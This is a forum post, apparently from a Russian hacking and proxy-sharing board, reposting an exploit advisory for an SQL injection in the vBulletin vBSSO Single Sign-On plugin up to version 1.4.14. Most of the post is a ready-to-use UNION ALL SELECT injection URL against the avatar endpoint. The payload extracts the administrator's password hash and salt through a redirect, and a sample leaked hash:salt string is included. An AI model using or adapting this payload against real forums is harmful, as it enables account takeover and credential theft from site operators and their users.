Ваш ключ: необходима авторизация | MyProxy - бесплатный обменник валидных прокси между пользователями форума.

vBulletin vBSSO Single Sign-On 1.4.14 - SQL Injection

Тема в разделе vBulletin, создана пользователем ERROR404, 10 авг 2015.

Войдите для ответа
  1. ERROR404 Администратор

    ERROR404
    Статус:
    Вне сети
    # Exploit Title: vBulletin vBSSO Single Sign-On – <= 1.4.14 – SQL Injection

    # Date: January 20, 2015

    # Exploit Author: Technidev (https://technidev.com)

    # Vendor Homepage: https://vbulletin.com

    # Software Link: http://www.vbulletin.org/forum/showthread.php?t=270517

    # Version: <= 1.4.14, patched in >= 1.4.15

     

    This plugin is vulnerable to SQL injection at the /vbsso/avatar.php file

    in the fetchUserinfo function.

    It requires a big UNION ALL SELECT query and commenting out the LIMIT

    function of SQL. If SQL injection is a success, the browser will

    redirect the user to a URL where the URL contains the extracted information.

     

    To exploit this, you need to execute a rather large UNION ALL SELECT

    query like this:

    http://example.com/vbsso/vbsso.php?a=act&do=avatar&id=' or user.userid =

    1 UNION ALL SELECT userfield.*, usertextfield.*, user.*,

    usergroup.genericpermissions, UNIX_TIMESTAMP(passworddate) AS

    passworddate, IF(displaygroupid=0, user.usergroupid, displaygroupid) AS

    displaygroupid, concat(user.password, 0x3a, user.salt) AS avatarpath,

    NOT ISNULL(customavatar.userid) AS hascustomavatar,

    customavatar.dateline AS avatardateline, customavatar.width AS avwidth,

    customavatar.height AS avheight, customavatar.height_thumb AS

    avheight_thumb, customavatar.width_thumb AS avwidth_thumb,

    customavatar.filedata_thumb FROM user AS user LEFT JOIN userfield AS

    userfield ON (user.userid = userfield.userid) LEFT JOIN usergroup AS

    usergroup ON (usergroup.usergroupid = user.usergroupid) LEFT JOIN

    usertextfield AS usertextfield ON (usertextfield.userid = user.userid)

    LEFT JOIN avatar AS avatar ON (avatar.avatarid = user.avatarid) LEFT

    JOIN customavatar AS customavatar ON (customavatar.userid = user.userid)

    WHERE user.userid = 1 ORDER BY avatarpath DESC%23

     

    For example, by visiting this URL on a vulnerable forum, you will be

    redirected to

    http://example.com/9d0d647f535a4c1f493eabf3d69ca89a:nO^sh9;TVNxGJ”X’+3cYkq9Z4Cd3WS

    which obviously contains the hash and salt of userid 1.
     
    10 авг 2015 #1
    Последнее редактирование модератором: 10 авг 2015
Загрузка...
Похожие темы
  1. ERROR404
    Ответов:
    1
    Просмотров:
    558
  2. ERROR404
    Ответов:
    0
    Просмотров:
    405
  3. ERROR404
    Ответов:
    0
    Просмотров:
    358
  4. ERROR404
    Ответов:
    0
    Просмотров:
    366
  5. ERROR404
    Ответов:
    0
    Просмотров:
    326
Top